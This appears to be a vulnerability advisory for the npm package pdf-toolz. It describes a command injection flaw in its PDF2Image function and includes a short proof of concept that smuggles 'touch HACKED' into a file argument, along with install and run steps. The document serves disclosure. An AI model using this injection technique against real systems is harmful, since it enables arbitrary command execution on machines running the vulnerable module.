pdf-toolz

vulnerability remote code execution
severity 3.8
language javascript
registry npm

Description

The pdf-toolz module is vulnerable against arbitrary command injection due to the fact some inputs given by the user are unsafely processed and executed.

POC

  1. Create the following PoC file:
// poc.js
var pdf = require('pdf-toolz/PDF2Image');
pdf.pdfToImage("a", "test; touch HACKED; #");

  1. Check there aren't files called HACKED
  2. Execute the following commands in another terminal:
apt-get install graphicsmagick # Install the *gm* executable needed for the module
npm i pdf-toolz # Install affected module
node poc.js #  Run the PoC
  1. Recheck the files: now HACKED has been created

References